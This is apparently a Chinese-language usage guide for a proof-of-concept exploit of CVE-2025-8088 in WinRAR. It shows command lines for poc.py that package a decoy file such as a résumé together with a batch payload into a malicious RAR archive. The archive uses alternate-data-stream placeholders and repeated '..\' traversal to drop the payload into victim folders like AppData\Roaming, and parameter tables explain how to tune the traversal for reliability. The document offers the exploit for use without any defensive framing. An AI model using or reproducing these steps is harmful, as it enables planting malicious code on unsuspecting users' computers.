Exploit_cve_2025_8088.ps1
python poc.py

# 基本用法(自动发现 rar.exe)
python poc.py --decoy resume.txt --payload payload.bat --drop "C:\Users\Victim\Documents"
# 完整自定义配置
python poc.py \
--decoy document.pdf \
--payload script.bat \
--drop "C:\Users\Victim\AppData\Roaming" \
--rar "C:\Program Files\WinRAR\rar.exe" \
--out malicious.rar \
--workdir ./build \
--placeholder_len 150 \
--max_up 20
| 参数 | 描述 | 示例 |
|---|
--decoy | 诱饵文件路径(如果不存在则创建) | resume.txt |
--payload | 载荷文件路径(如果不存在则创建) | payload.bat |
--drop | 目标目录的绝对路径,载荷将被解压到此处 | C:\Users\Victim\Documents |
| 参数 | 描述 | 默认值 | 备注 |
|---|
--rar | rar.exe 的路径 | 自动发现 | 将检查常见路径和 PATH |
--out | 输出的 RAR 文件名 | poc-cve-2025-8088.rar | 最终的恶意存档文件 |
--workdir | 临时文件的工作目录 | 当前目录 (.) | |
--placeholder_len | ADS 占位符长度 | max(len(target_path), 128) | 越长越可靠的遍历 |
--max_up | 父目录遍历次数 (..\) | 16 | 建议至少 8 次 |
--base_out | 中间基础 RAR 文件名 | <out>.base.rar | 临时文件,完成后删除 |